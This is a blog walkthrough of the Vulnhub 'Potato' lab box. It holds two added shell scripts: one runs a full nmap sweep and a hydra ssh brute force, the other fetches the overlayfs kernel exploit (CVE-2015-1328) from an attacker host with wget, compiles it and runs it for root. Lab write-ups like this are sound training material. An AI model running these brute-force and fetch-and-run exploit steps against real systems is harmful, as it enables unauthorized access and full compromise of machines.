Vulnhub: Potato Walkthrough

dorian5, Dec 6, 2020

Today we are working on Potato from Vulnhub.com. This box is rated Easy to Medium. After downloading the VM and setting it up in VMware, we start with our nmap scans.

Two ports are open: http and tcp/7120, which service detection identifies as ssh on a non-standard port. This is a good example of why we scan all TCP ports (-p-) in our initial scan: a default top-1000 scan (without -p-) would not have found the second port, and with it the only way onto the box.

If we browse to the site in Firefox, the single page shown above is the sum total of what we get. The info.php page that the nmap http-enum script detected gives us useful information about the box, but no obvious remote exploit vector.

I’ll tell you now that I Dirbusted this site to death looking for other information. I tried multiple word lists and more than a dozen different file extensions looking for hidden folders or files. I came up completely empty. However, I have done boxes from this creator before, and combined with the hint, “If you ever get stuck, try again with the name of the lab”, I attempted to brute-force the ssh login with hydra using the username “potato” and the password list rockyou.txt.

Hydra discovers a password of “letmein” for user potato. Fortunately, the box creator chose a password close to the beginning of rockyou.txt, or else this brute-force attempt could have taken days to complete. Having us discover creds by brute-forcing ssh isn’t the most educational way to design a box, but hey, we can now log in.
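The enumeration and brute-force steps above, as an added example that is not part of the original post. It wraps the full-port nmap sweep, a small parser for nmap's greppable (-oG) output that lists only open ports (so the alternate ssh port stands out), and the hydra call against tcp/7120. The target address, the wordlist path and the sample scan output embedded below are assumptions and constructed data, not output from the real box.

```shell
#!/bin/sh
# Added example, not from the original post. TARGET, WORDLIST and the sample
# greppable output are assumptions; nothing here is real Potato output.

# Full TCP sweep with service detection, the default scripts and http-enum
# (http-enum is not in the default set, so it is requested explicitly).
# -p- is what surfaces tcp/7120; a top-1000 scan skips it.
full_scan() {
    nmap -p- -sV --script "default,http-enum" -T4 -oG "scan-$1.gnmap" "$1"
}

# Print one "port/proto service version" line per OPEN port from nmap -oG
# output on stdin. Greppable lines look like:
#   Host: 10.0.0.5 ()<TAB>Ports: 80/open/tcp//http//Apache httpd/, ...<TAB>Ignored State: closed (65533)
# Each port entry is port/state/proto/owner/service/rpc/version/.
open_ports() {
    sed -n '/Ports: /{s/.*Ports: //;s/[[:space:]]*Ignored State.*//;p;}' \
    | tr ',' '\n' \
    | awk -F/ '{ sub(/^ +/, "", $1) }
               $2 == "open" { v = ($7 == "") ? "" : " " $7; print $1 "/" $3 " " $5 v }'
}

# ssh brute force on the alternate port. -t 4 keeps parallel connections low
# enough that sshd's MaxStartups does not start dropping sessions and hide a hit.
brute_ssh() {
    hydra -l potato -P "${WORDLIST:-/usr/share/wordlists/rockyou.txt}" -t 4 -s 7120 "ssh://$1"
}

# Constructed sample of -oG output: one closed/filtered port to show it is
# skipped, plus the two open ports the walkthrough describes.
SAMPLE_GNMAP=$(printf 'Host: 192.168.56.101 ()\tStatus: Up\nHost: 192.168.56.101 ()\tPorts: 22/filtered/tcp//ssh///, 80/open/tcp//http//Apache httpd/, 7120/open/tcp//ssh//OpenSSH/\tIgnored State: closed (65533)\n')

if [ -n "${TARGET:-}" ]; then
    full_scan "$TARGET" && open_ports < "scan-$TARGET.gnmap" && brute_ssh "$TARGET"
else
    # No TARGET set: just exercise the parser on the constructed sample.
    printf '%s\n' "$SAMPLE_GNMAP" | open_ports
fi
```

Run it with `TARGET=<ip> sh recon.sh` to do the real sweep and brute force; without TARGET it only demonstrates the parser. The parser is the part worth keeping: feeding every -oG file through it gives a one-line-per-service summary you can diff between a top-1000 and a -p- scan.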

Looking back, the login banner (which prints the kernel version) already gave us all the info we needed for our root escalation, but at the time I just launched into my standard privesc checks. linpeas.sh immediately flagged kernel version 3.13.0-24-generic as out of date, so I got to work researching kernel exploits for privesc.

My first thought was to attempt Dirty COW (CVE-2016-5195), a race condition in the kernel’s copy-on-write handling; the common PoC uses it to overwrite /etc/passwd with a new user that has root privileges. However, the exploit broke the box and I had to reboot it. This is a great reminder for anyone who has aspirations for pentesting in the real world that using dynamite to pick a lock is not always the best option.

After rebooting the box, I continued my kernel exploit search on exploit-db.com. The next exploit that looked interesting was this one: https://www.exploit-db.com/exploits/37292. We see from the exploit-db entry that it is a local privesc exploit for the ‘overlayfs’ bug (CVE-2015-1328) and that it fits our kernel and OS versions. I downloaded the exploit to my Kali box and then launched SimpleHTTPServer so I could download it to Potato.

After that, follow the instructions in the exploit’s header comment to compile and run it.
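The transfer, compile and run steps above, as an added example that is not part of the original post or of the exploit author's code. After the Dirty COW crash, the point of the example is the gate in front of the exploit: check that the running kernel actually sits inside the window the exploit-db entry advertises for 37292 (3.13.0 up to but not including 3.19, the Ubuntu 12.04/14.04/14.10/15.04 kernels) and that a compiler is present, before anything is fired at the box. The attacker IP, the listening port and the file names are assumptions.

```shell
#!/bin/sh
# Added example, not from the original post or from exploit-db 37292 itself.
# KALI_IP, port 8000 and the file names /tmp/ofs.c and /tmp/ofs are assumptions.

# Return 0 when a `uname -r` string falls inside the window the exploit-db
# entry for 37292 advertises: 3.13.0 <= version < 3.19. Anything else, including
# garbage input, returns 1 so the caller never runs the exploit by accident.
kernel_in_range() {
    major=${1%%.*}
    rest=${1#*.}
    minor=${rest%%.*}
    minor=${minor%%-*}
    case "$major$minor" in *[!0-9]*|'') return 1 ;; esac
    if [ "$major" -eq 3 ] && [ "$minor" -ge 13 ] && [ "$minor" -lt 19 ]; then
        return 0
    else
        return 1
    fi
}

# Sanity checks on the target before compiling anything: version window and a
# working gcc. (Take a VM snapshot first; the Dirty COW attempt showed why.)
preflight() {
    if ! kernel_in_range "$(uname -r)"; then
        echo "kernel $(uname -r) is outside 3.13-3.18, not running 37292" >&2
        return 1
    fi
    if ! command -v gcc >/dev/null 2>&1; then
        echo "no gcc on target; build on a box with the same libc and copy the binary" >&2
        return 1
    fi
}

# On the attacker box: serve the downloaded source. The post used Python 2's
# SimpleHTTPServer; on a current Kali the equivalent is python3 -m http.server.
serve_exploit() {
    cd "$(dirname "$1")" && python3 -m http.server 8000
}

# On Potato: fetch, build and run. The exploit header documents the same
# two-step build (gcc ofs.c -o ofs; ./ofs); success drops into a root shell.
fetch_and_run() {
    wget -q "http://$1:8000/37292.c" -O /tmp/ofs.c \
    && gcc /tmp/ofs.c -o /tmp/ofs \
    && /tmp/ofs
}

if [ "${1:-}" = run ]; then
    preflight && fetch_and_run "${KALI_IP:?set KALI_IP to the attacker address}"
else
    # Demo mode: show the version gate on a few constructed uname -r strings.
    for v in 3.13.0-24-generic 3.19.0-25-generic 4.4.0-31-generic; do
        if kernel_in_range "$v"; then echo "$v: in range"; else echo "$v: out of range"; fi
    done
fi
```

Invoked without arguments the script only exercises the version gate; `KALI_IP=<attacker> sh privesc.sh run` on the target performs the actual transfer and build. The gate is deliberately on major.minor only, matching how the exploit-db title states the range; the Ubuntu patch level after the dash is not part of that statement, so it is ignored rather than guessed at.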

And that is it — we have rooted the box! Feeling a bit like a script kiddie, but even easy boxes help to reinforce our pentesting skills and methodologies. Did you find another path to root? Drop me a comment and let me know. Thanks for reading!
